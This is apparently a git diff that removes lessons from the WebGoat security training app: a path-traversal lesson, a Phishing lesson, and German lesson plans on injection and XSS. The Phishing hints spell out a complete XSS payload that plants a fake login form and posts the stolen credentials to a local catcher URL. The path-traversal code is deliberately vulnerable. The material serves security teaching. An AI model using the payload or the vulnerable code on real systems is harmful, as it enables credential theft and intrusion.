- // File f = new File( new URI("file:///" + - // Encoding.urlEncode(dir).replaceAll("\\\\","/") + "/" + - // file.replaceAll("\\\\","/")) ); - File f = new File((dir + "\\" + file).replaceAll("\\\\", "/")); - - if (s.isDebug()) - { - - s.setMessage(getLabelManager().get("File") + file); - s.setMessage(getLabelManager().get("Dir")+ dir); - // s.setMessage("File URI: " + "file:///" + - // (Encoding.urlEncode(dir) + "\\" + - // Encoding.urlEncode(file)).replaceAll("\\\\","/")); - s.setMessage(getLabelManager().get("IsFile")+ f.isFile()); - s.setMessage(getLabelManager().get("Exists") + f.exists()); - } - if (!illegalCommand) - { - if (f.isFile() && f.exists()) - { - // Don't set completion if they are listing files in the - // directory listing we gave them. - if (upDirCount(file) >= 1) - { - s.setMessage(getLabelManager().get("CongratsAccessToFileAllowed")); - s.setMessage(" ==> " + Encoding.urlDecode(f.getCanonicalPath())); - makeSuccess(s); - } - else - { - s.setMessage(getLabelManager().get("FileInAllowedDirectory")); - s.setMessage(" ==> " + Encoding.urlDecode(f.getCanonicalPath())); - } - } - else if (file != null && file.length() != 0) - { - s - .setMessage(getLabelManager().get("AccessToFileDenied1") + Encoding.urlDecode(f.getCanonicalPath()) - + getLabelManager().get("AccessToFileDenied2")); - } - else - { - // do nothing, probably entry screen - } - - try - { - // Show them the file - // Strip out some of the extra html from the "help" file - ec.addElement(new BR()); - ec.addElement(new BR()); - ec.addElement(new HR().setWidth("100%")); - ec.addElement(getLabelManager().get("ViewingFile")+ f.getCanonicalPath()); - ec.addElement(new HR().setWidth("100%")); - if (f.length() > 80000) { throw new Exception(getLabelManager().get("FileTooLarge")); } - String fileData = getFileText(new BufferedReader(new FileReader(f)), false); - if (fileData.indexOf(0x00) != -1) { throw new Exception(getLabelManager().get("FileBinary")); } - ec.addElement(new 
StringElement(fileData.replaceAll(System.getProperty("line.separator"), "
") - .replaceAll("(?s)", "").replaceAll("

", "
") - .replaceAll("
\\s
", "
").replaceAll("<\\?", "<").replaceAll("<(r|u|t)", - "<$1"))); - } catch (Exception e) - { - ec.addElement(new BR()); - ec.addElement(getLabelManager().get("TheFollowingError")); - ec.addElement(e.getMessage()); - } - } - } catch (Exception e) - { - s.setMessage(getLabelManager().get("ErrorGenerating")+ this.getClass().getName()); - e.printStackTrace(); - } - - return (ec); - } - - private int upDirCount(String fileName) - { - int count = 0; - int startIndex = fileName.indexOf(".."); - while (startIndex != -1) - { - count++; - startIndex = fileName.indexOf("..", startIndex + 1); - } - return count; - } - - /** - * DOCUMENT ME! - * - * @return DOCUMENT ME! - */ - protected Category getDefaultCategory() - { - return Category.ACCESS_CONTROL; - } - - /** - * Gets the hints attribute of the AccessControlScreen object - * - * @return The hints value - */ - protected List getHints(WebSession s) - { - List hints = new ArrayList(); - hints.add(getLabelManager().get("PathBasedAccessControlHint1")); - hints.add(getLabelManager().get("PathBasedAccessControlHint2")); - hints.add(getLabelManager().get("PathBasedAccessControlHint3")); - hints.add(getLabelManager().get("PathBasedAccessControlHint4")); - - return hints; - } - - /** - * Gets the instructions attribute of the WeakAccessControl object - * - * @return The instructions value - */ - public String getInstructions(WebSession s) - { - String instructions = getLabelManager().get("PathBasedAccessControlInstr1")+ s.getUserName() + getLabelManager().get("PathBasedAccessControlInstr2"); - - return (instructions); - } - - private final static Integer DEFAULT_RANKING = new Integer(115); - - protected Integer getDefaultRanking() - { - return DEFAULT_RANKING; - } - - /** - * Gets the title attribute of the AccessControlScreen object - * - * @return The title value - */ - public String getTitle() - { - return ("Bypass a Path Based Access Control Scheme"); - } -} 
diff --git a/src/main/java/org/owasp/webgoat/lessons/Phishing.java b/src/main/java/org/owasp/webgoat/lessons/Phishing.java
deleted file mode 100644
index 9cfd2a357..000000000
--- a/src/main/java/org/owasp/webgoat/lessons/Phishing.java
+++ /dev/null
@@ -1,297 +0,0 @@
-
-package org.owasp.webgoat.lessons;
-
-import java.util.ArrayList;
-import java.util.List;
-import org.apache.ecs.Element;
-import org.apache.ecs.ElementContainer;
-import org.apache.ecs.StringElement;
-import org.apache.ecs.html.B;
-import org.apache.ecs.html.BR;
-import org.apache.ecs.html.Comment;
-import org.apache.ecs.html.H1;
-import org.apache.ecs.html.HR;
-import org.apache.ecs.html.Input;
-import org.apache.ecs.html.TD;
-import org.apache.ecs.html.TH;
-import org.apache.ecs.html.TR;
-import org.apache.ecs.html.Table;
-import org.owasp.webgoat.Catcher;
-import org.owasp.webgoat.session.ECSFactory;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- *
- *
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- *
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- *
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- *
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- *
- * Getting Source ==============
- *
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- *
- * For details, please see http://webgoat.github.io
- *
- * @author Bruce Mayhew WebGoat
- * @created March 13, 2007
- */
-public class Phishing extends LessonAdapter
-{
-
- /**
- * Description of the Field
- */
- protected final static String SEARCH = "Username";
- private String searchText;
-
- /**
- * Description of the Method
- *
- * @param s
- * Description of the Parameter
- * @return Description of the Return Value
- */
- private boolean postedCredentials(WebSession s)
- {
- String postedToCookieCatcher = getLessonTracker(s).getLessonProperties().getProperty(Catcher.PROPERTY,
- Catcher.EMPTY_STRING);
-
- //
- return (!postedToCookieCatcher.equals(Catcher.EMPTY_STRING));
- //
- }
-
- /**
- * Description of the Method
- *
- * @param s
- * Description of the Parameter
- * @return Description of the Return Value
- */
- protected Element createContent(WebSession s)
- {
- ElementContainer ec = new ElementContainer();
-
- try
- {
- searchText = s.getParser().getRawParameter(SEARCH, "");
- //
- //
-
- ec.addElement(makeSearch(s));
- if (postedCredentials(s))
- {
- makeSuccess(s);
- }
- } catch (Exception e)
- {
- s.setMessage("Error generating " + this.getClass().getName());
- }
-
- return (ec);
- }
-
- protected Element makeSearch(WebSession s)
- {
- ElementContainer ec = new ElementContainer();
-
- ec.addElement(new H1().addElement("WebGoat Search "));
- Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setAlign("center");
-
- TR tr = new TR();
- tr.addElement(new TD().addElement(" ").setColSpan(2));
- t.addElement(tr);
- if (s.isColor())
- {
- t.setBorder(1);
- }
-
- tr = new TR();
- tr.addElement(new TH().addElement("This facility will search the WebGoat source.").setColSpan(2)
- .setAlign("center"));
- t.addElement(tr);
-
- tr = new TR();
- tr.addElement(new TD().addElement(" ").setColSpan(2));
- t.addElement(tr);
-
- TR row1 = new TR();
- row1.addElement(new TD(new B(new StringElement("Search: "))).setAlign("right"));
-
- Input input1
= new Input(Input.TEXT, SEARCH, searchText); - row1.addElement(new TD(input1).setAlign("left")); - t.addElement(row1); - - Element b = ECSFactory.makeButton("Search"); - t.addElement(new TR(new TD(b).setColSpan(2)).setAlign("center")); - ec.addElement(t); - - if (!searchText.equals("")) - { - ec.addElement(new BR()); - ec.addElement(new HR()); - ec.addElement(new BR()); - ec.addElement(new StringElement("Results for: " + searchText)); - ec.addElement(new Comment("Search results")); - ec.addElement(new BR()); - ec.addElement(new BR()); - ec.addElement(new B(new StringElement("No results were found."))); - ec.addElement(new Comment("End of Search results")); - } - - return (ec); - } - - /** - * Gets the hints attribute of the CluesScreen object - * - * @return The hints value - */ - protected List getHints(WebSession s) - { - List hints = new ArrayList(); - hints.add("Try adding HTML to the search field to create a fake authentication form.
" - + "Try to make the form look official."); - hints - .add("Try:
" - + "<form name="phish"><br><br><HR><H3>This feature requires account login:</H2" - + "><br><br>Enter Username:<br><input type="text" " - + "name="user"><br>Enter Password:<br><input type="password" " - + "name = "pass"><br></form><br><br><HR>"); - hints - .add("Add functionality that can post a request, a button might work

" - + "After getting the button on the page, don't forget you will need to steal the credentials and post them to:
" - + "http://localhost/webgoat/capture/PROPERTY=yes&ADD_CREDENTIALS_HERE"); - hints - .add("Try:
" - + "<input type="submit" name="login" " - + "value="login">" - + "

In the whole script:

" - + "<form name="phish"><br><br><HR><H3>This feature requires account login:</H2" - + "><br><br>Enter Username:<br><input type="text" " - + "name="user"><br>Enter Password:<br><input type="password" " - + "name = "pass"><br><input type="submit" name="login" " - + "value="login" onclick="hack()"></form><br><br><HR>"); - hints - .add("Make the button perform an action on submit,
" - + "adding an onclick=\"hack()\" might work
" - + "Don't forget to add the hack() javascript function" - + "

In the whole script:

" - + "<form name="phish"><br><br><HR><H3>This feature requires account login:</H2" - + "><br><br>Enter Username:<br><input type="text" " - + "name="user"><br>Enter Password:<br><input type="password" " - + "name = "pass"><br><input type="submit" name="login" " - + "value="login" onclick="hack()"></form><br><br><HR>
" - + "Also, check firebug. Does the search form need to be terminated for this to work...? (</form>)"); - hints - .add("You need to create the hack() function. This function will pull the credentials from the " - + "webpage and post them to the WebGoat catcher servlet.
" - + "
Some useful code snippets:
    " - + "
  • doucument.phish.user.value - will access the user field" - + "
  • XssImage = new Image(); XssImage.src=SOME_URL = will perform a post" - + "
  • javascript string concatentation uses a \"+\"
" - + "

The entire javascript portion:

" - + "<script>function hack(){ " - + "XSSImage=new Image; XSSImage.src="http://localhost/webgoat/catcher?PROPERTY=yes&user="+" - + "document.phish.user.value + "&password=" + document.phish.pass.value + "";" - + "alert("Had this been a real attack... Your credentials were just stolen." - + "\nUser Name = " + document.phish.user.value + "\nPassword = " + document.phish.pass.value);} " - + "</script>"); - hints - .add("Complete solution for this lesson:

" - + "</form><script>function hack(){ " - + "XSSImage=new Image; XSSImage.src="http://localhost/webgoat/catcher?PROPERTY=yes&user="+" - + "document.phish.user.value + "&password=" + document.phish.pass.value + "";" - + "alert("Had this been a real attack... Your credentials were just stolen." - + "\nUser Name = " + document.phish.user.value + "\nPassword = " + document.phish.pass.value);} " - + "</script><form name="phish"><br><br><HR><H3>This feature requires account login:</H2" - + "><br><br>Enter Username:<br><input type="text" " - + "name="user"><br>Enter Password:<br><input type="password" " - + "name = "pass"><br><input type="submit" name="login" " - + "value="login" onclick="hack()"></form><br><br><HR>"); - /** - * password

- *
- *
- *

This feature requires account login:


- *
- * Enter Username:
- *
- * Enter Password:
- *
- *
- *
- *
- * -"Basic Authentication" wird benutzt um Server-seitige Resource zu schützen. Wird eine Anfrage an eine geschützte Resource gestellt, so sendet der Webserver ein "401 authentication request" mit der Antwort auf diese Anfrage. -Dann fragt, auf der Client Seite, der Browser den Benutzer mittels einer Dialogbox nach Benutzername und Passwort für diese Resource. -Der Browser enkodiert Benutzername und Passwort mit base64 und sendet diese Zugangsdaten zum Webserver. -Daraufhin validiert der Webserver Benutzername und Passwort und gibt als Antwort die angeforderte Resource zurück falls die übermittelten Zugangsdaten korrekt sind. -Die Zugangsdaten werden vom Browser bei jedem weiteren Zugriff auf geschützte Resourcen mitgesendet ohne dass der Benutzer -sie ein weiteres Mal eingeben muss.
-
-

Grundsätzliche(s) Ziel(e):

-Das Ziel dieser Lektion ist es "Basic Authentication" zu verstehen und die folgenden Fragen zu beantworten.
-
diff --git a/src/main/webapp/lesson_plans/German/CommandInjection.html b/src/main/webapp/lesson_plans/German/CommandInjection.html
deleted file mode 100644
index a8de365cb..000000000
--- a/src/main/webapp/lesson_plans/German/CommandInjection.html
+++ /dev/null
@@ -1,16 +0,0 @@
-
-

Lehrplan: Einschleusen von Programmcode

-
-

Konzept:

- -Das Einschleusen von Programmcode stellt eine ernst zu nehmende Bedrohung für dynamische Webseiten dar. Entsprechende Angriffe -sind leicht zu lernen und der verursachte Schaden ist schwer bzw. entspricht der Kompromittierung des kompletten Systems. -Trotz dieses Gefahrenpotentials ist eine unglaubliche Anzahl von Systemen im Internet für diese Form des Angriffs verwundbar. -Dieser Angriff ist zwar leicht durchzuführen, allerdings ist er auch mit ein wenig gesundem Menschenverstand und Vorausdenken -leicht zu verhindern. Die anerkannte Vorgehensweise zur Verhinderung dieser Angriffstypen -besteht darin alle Eingabedaten zu säubern, insbesondere die Daten die in Betriebssystembefehlen, -Skripten und Datenbankabfragen eingebaut werden. -

Grundsätzliche(s) Ziel(e):

-
-Schleusen Sie einen Befehl in das darunterliegende Betriebssystem ein.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/German/HiddenFieldTampering.html b/src/main/webapp/lesson_plans/German/HiddenFieldTampering.html
deleted file mode 100644
index c4606ac75..000000000
--- a/src/main/webapp/lesson_plans/German/HiddenFieldTampering.html
+++ /dev/null
@@ -1,14 +0,0 @@
-
-

Lehrplan: Versteckte Felder ausnutzen

-
-

Konzept:

- -Entwickler benutzen versteckte Formularfelder zur Besucherverfolgung, für den Login, für Preisinformationen und andere -Informationen. Dies ist ein sehr einfacher und bequemer Mechnismus für Entwickler, allerdings werden die Werte -diese Felder nur selten geprüft bevor sie benutzt werden. In dieser Lektion lernt man wie man versteckte Felder -zu seinem Vorteil manipulieren kann. - -
- -

Grundsätzliche(s) Ziel(e):

-Nutzen Sie ein verstecktes Formularfeld aus, um den HD Fernseher zu einem falschen Preis zu kaufen.
diff --git a/src/main/webapp/lesson_plans/German/HtmlClues.html b/src/main/webapp/lesson_plans/German/HtmlClues.html
deleted file mode 100644
index 70d63e5ee..000000000
--- a/src/main/webapp/lesson_plans/German/HtmlClues.html
+++ /dev/null
@@ -1,13 +0,0 @@
-
-

Lehrplan: Nützliche Hinweise in HTML entdecken.

-
- -

Konzept:

- - Entwickler lassen oftmals Kommentare wie FIXME's, TODO's, Code Broken, Hack usw. im Quellcode. - Durchsuchen Sie den Quellcode nach allem was für Sie nach Passwörtern, Hintertüren oder anderen Unregelmäßigkeiten aussieht. - - -
-

Grundsätzliche(s) Ziel(e):

-Sie suchen und finden Hinweise im Quellcode die es Ihnen erlauben sich anzumelden.
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/German/HttpBasics.html b/src/main/webapp/lesson_plans/German/HttpBasics.html
deleted file mode 100644
index 995912eeb..000000000
--- a/src/main/webapp/lesson_plans/German/HttpBasics.html
+++ /dev/null
@@ -1,29 +0,0 @@
-
-

Lehrplan: Http Basics

-
- -

Lehrinhalt:

- Diese Lektion stellt die Verständnis-Grundlagen für den Datentransport zwischen Browser und Webapplikation dar.
-
-

-So funktioniert HTTP: -

-Alle HTTP Transaktionen folgen demselben Schema. Jede Anfrage vom Client und jede Antwort des Servers besteht aus drei Teilen: Der Anfrage-/Antwortzeile, dem Kopf und dem Körper. -Der Client initiiert eine Transaktion wie folgt:
-
- Der Client kontaktiert den Server und sendet eine Dokumentenanfrage
-
-
-
    GET /index.html?param=value HTTP/1.0
- Als nächstes sendet der Client optionale Kopfzeilen (Header) um den Server über die Client-seitige Konfiguration und die akzeptierten Dokumentenformate zu informieren.
-
-
    User-Agent: Mozilla/4.06 Accept: image/gif,image/jpeg, */*
-Nachdem der eigentliche Anfrage (Request) und den weiteren Kopfzeilen (Header) kann der Client noch weitere Daten senden. Diese Daten werden meistens von CGI Programmen im Zusammenhang mit der POST Methode ausgewertet. -
-

Grundsätzliche(s) Ziel(e):

- -Geben Sie Ihren Namen in das Eingabefeld ein und drücken sie "Los gehts!" um die Anfrage abzuschicken. Der Server wird die Anfrage akzeptieren, Ihre Eingabedaten umdrehen, und wieder zu Ihnen zurückschicken. Dies stellt eine vollständige HTTP Transaktion dar! -

-Sie sollten mit der Benutzung von WebGoat vertraut werden. Es sollten die Knöpfe für Hinweise (Hints), für das Anzeigen von Parametern(Parameters) oder Cookies und für das Anzeigen von Java-Quellcode ausprobiert werden. -Außerdem, können Sie hier WebScarab gut ausprobieren. -
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/German/JavaScriptValidation.html b/src/main/webapp/lesson_plans/German/JavaScriptValidation.html
deleted file mode 100644
index f278bc9d9..000000000
--- a/src/main/webapp/lesson_plans/German/JavaScriptValidation.html
+++ /dev/null
@@ -1,19 +0,0 @@
-
-

Lehrplan: Client-seitige JavaScript Validierung umgehen

-
-

Konzept:

- -Client-seitige Validierung sollte nicht als eine sichere Maßnahme zur Validierung von Parametern angesehen werden. -Diese Art der Validierung kann höchstens den Server entlasten und verhindern das normale Benutzer Eingabedaten in -einem falschen Format absenden. Angreifer hingegen, können diesen Mechanismus auf verschiedene Arten umgehen. Jede -Client-seitige Validierung sollte auf der Serverseite wiederholt werden. Dies verhindert, dass unsichere Parameter -in der Applikation benutzt werden. - -
-

Grundsätzliche(s) Ziel(e):

- -Das untenstehende Formular verlangt von Ihnen verschiedene Regeln beim Ausfüllen einzuhalten. Dies wird Client-seitig -überprüft. Versuchen Sie diese -Regeln zu brechen und senden Sie Daten an die Webseite die die Webseite nicht erwartet! Sie müssen alle 7 Regeln -gleichzeitig brechen! -
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/German/LogSpoofing.html b/src/main/webapp/lesson_plans/German/LogSpoofing.html
deleted file mode 100644
index c5bbff3b0..000000000
--- a/src/main/webapp/lesson_plans/German/LogSpoofing.html
+++ /dev/null
@@ -1,17 +0,0 @@
-
-

Lehrplan: Fälschen von Einträgen in Log Dateien (Log Spoofing)

-
- -

Konzept:

-

-Log-Einträge in Log-Dateien müssen nicht immer von tatsächlichen Ereignissen stammen. Ein Angreifer kann durch Einschleusen -bestimmter Einträge das Eintreten bestimmter Ereignisse vortäuschen und dadurch den Administrator zu unnötigen bzw. voreiligen -Handlungen verleiten bzw. ihn einfach nur verwirren. -

- -

Grundsätzliche(s) Ziel(e):

- -* Der graue Bereich steht für das was tatsächlich in der Log-Datei des Webservers erscheint.
-* Ihr Ziel ist es so aussehen zu lassen, als hätte sich der Benutzer "admin" erfolgreich eingeloggt.
-* Verbessern Sie Ihren Angriff, indem Sie ein Skript (Javascript) in das Log schreiben. -
diff --git a/src/main/webapp/lesson_plans/German/PathBasedAccessControl.html b/src/main/webapp/lesson_plans/German/PathBasedAccessControl.html
deleted file mode 100644
index c7afce017..000000000
--- a/src/main/webapp/lesson_plans/German/PathBasedAccessControl.html
+++ /dev/null
@@ -1,11 +0,0 @@
-
-

Lehrplan: Umgehen eines Pfad-basierten Zugangskontrollschemas

-
-

Konzept:

- -In einem Pfad-basierten Zugangangskontrollschemas (path based access control scheme), kann ein Angreifer den Pfad "bewandern" indem -er relative Pfadangaben übergibt. Dadurch kann der Angreifer auf Dateien zugreifen, die für niemanden zugänglich sind, bzw. zu denen -der Zugang bei direkter Anfrage ansonsten abgelehnt würde. - -

Grundsätzliche(s) Ziel(e):

-Sie sollten in der Lage sein auf eine Datei zuzugreifen die sich nicht im aufgelisteten Verzeichnis befindet.
diff --git a/src/main/webapp/lesson_plans/German/ReflectedXSS.html b/src/main/webapp/lesson_plans/German/ReflectedXSS.html
deleted file mode 100644
index 60f5e0e80..000000000
--- a/src/main/webapp/lesson_plans/German/ReflectedXSS.html
+++ /dev/null
@@ -1,19 +0,0 @@
-
-

Lehrplan: Cross Site Scripting (XSS)

-
-

Konzept:

- -Jegliche Eingabedaten sollten auf der Serverseite überprüft werden. -XSS passiert wenn nicht geprüfte Benutereingaben in eine HTTP Response eingebaut werden. -Bei einem reflektierten XSS Angriff, kann ein Angreifer eine URL erzeugen die ein Angriffsskript enthält und kann diese -URL auf einer Webseite hinterlegen, sie per Email verschicken oder ein Opfer auf eine andere Weise dazu bringen die -URL zu besuchen. - - - -

General Goal(s):

- -Ihre Aufgabe ist es, sich ein Stück Javascript zu überlegen das Sie in diese Seite einbauen können. -Dann versuchen Sie die Seite dazu zu bringen, Ihnen dieses Skript wieder auszulieferen (es zu reflektieren) -so dass das Skript in Ihrem Browser ausgeführt wird. -
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/German/RemoteAdminFlaw.html b/src/main/webapp/lesson_plans/German/RemoteAdminFlaw.html
deleted file mode 100644
index dbaaeb3c3..000000000
--- a/src/main/webapp/lesson_plans/German/RemoteAdminFlaw.html
+++ /dev/null
@@ -1,16 +0,0 @@
-
-

Lehrplan: Zugang zu Web-Resourcen erzwingen

-
-

Konzept::

-Applikationen haben oftmals eine Administrationsschnittstelle, das priviligierten Benutzern Zugang zu Funktionalität ermöglicht die -für normale Benutzer nicht sichtbar ist. Der Applikationsserver selbst hat auch oft noch eine seperate Administrationsschnittstelle. - -

Grundsätzliche(s) Ziel(e): - -Versuchen Sie auf die Administrationsschnittstelle von WebGoat zuzugreifen. Sie können auch versuchen auf die Administrationsschnittstelle -von Tomcat (der Applikationsserver) zuzugreifen. Die Tomcat Schnittstelle kann über die URL /admin erreicht werden, zählt aber nicht -für das Bestehen dieser Lektion. -Wenn Sie Zugriff auf Funktionalität der Administrationsschnittstelle erlangt haben, dann kommen Sie hierher zurück um zu sehen ob Sie -die Lektion abgeschlossen haben. - -

diff --git a/src/main/webapp/lesson_plans/German/SqlNumericInjection.html b/src/main/webapp/lesson_plans/German/SqlNumericInjection.html
deleted file mode 100644
index ad9e7cc41..000000000
--- a/src/main/webapp/lesson_plans/German/SqlNumericInjection.html
+++ /dev/null
@@ -1,18 +0,0 @@
-
-

Lehrplan: Durchführung von Numeric SQL Injection

-
- -

Konzept:

-SQL Injection Angriffe stellen eine ernstzunehmende Bedrohung für alle Datenbank-getriebenen Webseiten dar. -Entsprechende Angriffe sind leicht zu lernen und der verursachte Schaden ist schwer bzw. entspricht der -Kompromittierung des kompletten Systems. -Trotz dieses Gefahrenpotentials ist eine unglaubliche Anzahl von Systemen im Internet für diese Form des Angriffs verwundbar. -Dieser Angriff ist zwar leicht durchzuführen, allerdings ist er auch mit ein wenig gesundem Menschenverstand und Vorausdenken -leicht zu verhindern. Die anerkannte Vorgehensweise zur Verhinderung dieser Angriffstypen -besteht darin alle Eingabedaten zu säubern, insbesondere die Daten die in Betriebssystembefehlen, -Skripten und Datenbankabfragen eingebaut werden. -

Grundsätzliche(s) Ziel(e):

- -Das untenstehende Formular ermöglicht es dem Benutzer Wetterdaten zu betrachten. Versuchen Sie einen SQL String einzuschleusen, der -als Resultat alle Wetterdaten anzeigt. -
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/German/SqlStringInjection.html b/src/main/webapp/lesson_plans/German/SqlStringInjection.html
deleted file mode 100644
index 0cd360db7..000000000
--- a/src/main/webapp/lesson_plans/German/SqlStringInjection.html
+++ /dev/null
@@ -1,20 +0,0 @@
-
-

Lehrplan: Durchführung von String SQL Injection

-
- -

Konzept:

- -SQL Injection Angriffe stellen eine ernstzunehmende Bedrohung für alle Datenbank-getriebenen Webseiten dar. -Entsprechende Angriffe sind leicht zu lernen und der verursachte Schaden ist schwer bzw. entspricht der -Kompromittierung des kompletten Systems. -Trotz dieses Gefahrenpotentials ist eine unglaubliche Anzahl von Systemen im Internet für diese Form des Angriffs verwundbar. -Dieser Angriff ist zwar leicht durchzuführen, allerdings ist er auch mit ein wenig gesundem Menschenverstand und Vorausdenken -leicht zu verhindern. Die anerkannte Vorgehensweise zur Verhinderung dieser Angriffstypen -besteht darin alle Eingabedaten zu säubern, insbesondere die Daten die in Betriebssystembefehlen, -Skripten und Datenbankabfragen eingebaut werden. -

Grundsätzliche(s) Ziel(e):

- -Das untenstehende Formular erlaubt es Benutzern ihre Kreditkartennummern anzuzeigen. Das können Sie -exemplarisch mit dem Benutzernamen "Smith" ausprobieren. -Versuchen Sie einen SQL String einzuschleusen, der als Resultat alle Kreditkartennummern anzeigt. -
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/German/StoredXss.html b/src/main/webapp/lesson_plans/German/StoredXss.html
deleted file mode 100644
index 74463c949..000000000
--- a/src/main/webapp/lesson_plans/German/StoredXss.html
+++ /dev/null
@@ -1,16 +0,0 @@
-
-

Lehrplan: Durchführen von Stored Cross Site Scripting (XSS)

-
-

Konzept:

- -Man sollte Eingabedaten immer säubern, besonders diese die später als parameter für Betriebssystembefehle, Skripte -und Datenbankabfragen benutzt werden. Essentiell ist das für Inhalt der irgendwo in der Applikation permanent gespeichert -wird. Benutzer sollten nicht in der Lage sein eigene Inhalte zu hinterlassen, durch die andere Nutzer ungewünschte -Seiten oder Inhalte nachladen wenn der Inhalt betrachtet wird. - - -

Grundsätzliche(s) Ziel(e):

- -Hinterlassen Sie Inhalt der den Browser eines anderen Benutzers dazu bringt eine unerwünschte -Seite bzw. Inhalt anzuzeigen. -
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/German/WeakAuthenticationCookie.html b/src/main/webapp/lesson_plans/German/WeakAuthenticationCookie.html
deleted file mode 100644
index 5475df32c..000000000
--- a/src/main/webapp/lesson_plans/German/WeakAuthenticationCookie.html
+++ /dev/null
@@ -1,22 +0,0 @@
-
-

Lehrplan: Einen Authentisierungs Cookie fa¨lschen

-
- -

Lehrinhalt:

- -Viele Webapplikationen erlauben es einem Benutzer sofort eingeloggt zu sein, sobald der Benutzer den richtigen Authentisierungs Cookie übergibt. -Manchmal kann der richtige Wert dieses Cookies geraten werden, wenn der Algorithmus zur Generierung dieser Cookies bekannt ist. -Der Cookie kann auch von dem Computer des Benutzers gestohlen werden indem andere Schwachstellen in seinem System ausgenutzt werden. -Mittels Cross Site Scripting (XSS) kann der Cookie auch abgefangen werden. -Diese Übung soll Sie auf das Thema der Authentisierungs Cookies aufmerksam machen und gibt Ihnen -die Möglichkeit die Authentisierungsmethode dieser Lektion zu überwinden. - - - -

Grundsätzliche(s) Ziel(e):

- - Es ist Ihre Aufgabe die Authentisierung zu umgehen. Melden Sie sich mit dem Benutzernamen "webgoat" und dem Passwort "webgoat" an - und schauen Sie was passiert. Sie können auch versuchen Sich mit aspect/aspect anzumelden. Wenn Sie den Authentisierungs Cookie verstehen, - versuchen Sie Ihre Identität zu "alice" zu wechseln. - -
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/de/BasicAuthentication.html b/src/main/webapp/lesson_plans/de/BasicAuthentication.html
deleted file mode 100644
index 65490ef0c..000000000
--- a/src/main/webapp/lesson_plans/de/BasicAuthentication.html
+++ /dev/null
@@ -1,15 +0,0 @@
-
-

Lehrplan: Basic Authentication

-
-

Lehrinhalt:

- -"Basic Authentication" wird benutzt um Server-seitige Resource zu schützen. Wird eine Anfrage an eine geschützte Resource gestellt, so sendet der Webserver ein "401 authentication request" mit der Antwort auf diese Anfrage. -Dann fragt, auf der Client Seite, der Browser den Benutzer mittels einer Dialogbox nach Benutzername und Passwort für diese Resource. -Der Browser enkodiert Benutzername und Passwort mit base64 und sendet diese Zugangsdaten zum Webserver. -Daraufhin validiert der Webserver Benutzername und Passwort und gibt als Antwort die angeforderte Resource zurück falls die übermittelten Zugangsdaten korrekt sind. -Die Zugangsdaten werden vom Browser bei jedem weiteren Zugriff auf geschützte Resourcen mitgesendet ohne dass der Benutzer -sie ein weiteres Mal eingeben muss.
-
-

Grundsätzliche(s) Ziel(e):

-Das Ziel dieser Lektion ist es "Basic Authentication" zu verstehen und die folgenden Fragen zu beantworten. -
diff --git a/src/main/webapp/lesson_plans/de/CommandInjection.html b/src/main/webapp/lesson_plans/de/CommandInjection.html
deleted file mode 100644
index a8de365cb..000000000
--- a/src/main/webapp/lesson_plans/de/CommandInjection.html
+++ /dev/null
@@ -1,16 +0,0 @@
-
-

Lehrplan: Einschleusen von Programmcode

-
-

Konzept:

- -Das Einschleusen von Programmcode stellt eine ernst zu nehmende Bedrohung für dynamische Webseiten dar. Entsprechende Angriffe -sind leicht zu lernen und der verursachte Schaden ist schwer bzw. entspricht der Kompromittierung des kompletten Systems. -Trotz dieses Gefahrenpotentials ist eine unglaubliche Anzahl von Systemen im Internet für diese Form des Angriffs verwundbar. -Dieser Angriff ist zwar leicht durchzuführen, allerdings ist er auch mit ein wenig gesundem Menschenverstand und Vorausdenken -leicht zu verhindern. Die anerkannte Vorgehensweise zur Verhinderung dieser Angriffstypen -besteht darin alle Eingabedaten zu säubern, insbesondere die Daten die in Betriebssystembefehlen, -Skripten und Datenbankabfragen eingebaut werden. -

Grundsätzliche(s) Ziel(e):

- -Schleusen Sie einen Befehl in das darunterliegende Betriebssystem ein. -
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/de/HiddenFieldTampering.html b/src/main/webapp/lesson_plans/de/HiddenFieldTampering.html
deleted file mode 100644
index c4606ac75..000000000
--- a/src/main/webapp/lesson_plans/de/HiddenFieldTampering.html
+++ /dev/null
@@ -1,14 +0,0 @@
-
-

Lehrplan: Versteckte Felder ausnutzen

-
-

Konzept:

- -Entwickler benutzen versteckte Formularfelder zur Besucherverfolgung, für den Login, für Preisinformationen und andere -Informationen. Dies ist ein sehr einfacher und bequemer Mechnismus für Entwickler, allerdings werden die Werte -diese Felder nur selten geprüft bevor sie benutzt werden. In dieser Lektion lernt man wie man versteckte Felder -zu seinem Vorteil manipulieren kann. - -
- -

Grundsätzliche(s) Ziel(e):

-Nutzen Sie ein verstecktes Formularfeld aus, um den HD Fernseher zu einem falschen Preis zu kaufen.
diff --git a/src/main/webapp/lesson_plans/de/HtmlClues.html b/src/main/webapp/lesson_plans/de/HtmlClues.html
deleted file mode 100644
index 70d63e5ee..000000000
--- a/src/main/webapp/lesson_plans/de/HtmlClues.html
+++ /dev/null
@@ -1,13 +0,0 @@
-
-

Lehrplan: Nützliche Hinweise in HTML entdecken.

-
- -

Konzept:

